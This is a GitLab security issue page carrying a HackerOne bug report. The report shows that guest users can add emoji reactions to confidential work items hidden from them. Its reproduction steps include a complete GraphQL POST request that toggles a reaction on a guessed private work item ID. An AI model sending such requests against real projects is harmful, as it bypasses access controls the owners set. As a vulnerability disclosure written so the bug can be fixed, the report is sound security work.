Skip to content

Guest users can react (emojis) on confidential work items which they cant see in a project

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2036500 by ashish_r_padelkar on 2023-06-23, assigned to @ottilia_westerlund:

Report | Attachments | How To Reproduce

Report

Hello,

Confidential tasks can be created for a issue within a project. These confidential tasks (work items) are created as issues and are visible only to Reporters or Higher user roles.

There is a bug where guest users within a project can react with emojis to such private tasks/work item even when they are confidential and cant be seen.

Steps to reproduce

1.Go to https://gitlab.com/<groupNamespace>/<projectNamespace>/-/issues and create an issue.
2.Now add confidential task to it using below option.
Screen_Shot_2023-06-23_at_8.43.38_PM.png
3.Add a guest user to your project or group at https://gitlab.com/groups/<groupNamespace>/-/group_members.
4.Login as guest user.
5.Go to the issue created in step1.
6.You see the issue but not the task as its private.
7.Guess the private task item ID and replace it in below graphql request.

POST /api/graphql HTTP/2  
Host: gitlab.com  
Cookie: 1  
Content-Length: 316  
X-Gitlab-Feature-Category: team_planning  
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"  
X-Csrf-Token: 1  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36  
Content-Type: application/json  
Accept: */*  
Sec-Ch-Ua-Platform: "macOS"  
Origin: https://gitlab.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://gitlab.com/groupjune23/latest_project/-/work_items/25  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9

[{"operationName":"updateWorkItemAwardEmojiWidget","variables":{"input":{"awardableId":"gid://gitlab/WorkItem/128497667","name":"thumbsup"}},"query":"mutation updateWorkItemAwardEmojiWidget($input: AwardEmojiToggleInput!) {\n  awardEmojiToggle(input: $input) {\n    errors\n    toggledOn\n    __typename\n  }\n}\n"}]

Where 128497667 is the private task ID.

8.Also replace your Cookie and X-Csrf-Token.
9.Send the request and it will be successful.

Now as an admin, check the private work item/task item . You should see thumbsup reaction appeared on it.This happens despite guest user cant see that task.

What is the current bug behavior?

Guest users can react emojis on private work items which they cant see within a project.

What is the expected correct behavior?

Only users who has access to private work items should be able to react on it.

Output of checks

This bug happens on GitLab.com. GitLab Enterprise Edition 16.2.0-pre 2a4d9de2b78

Regards,
Ashish

Impact

Guest users can react on confidential work items which they cant see in a project

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: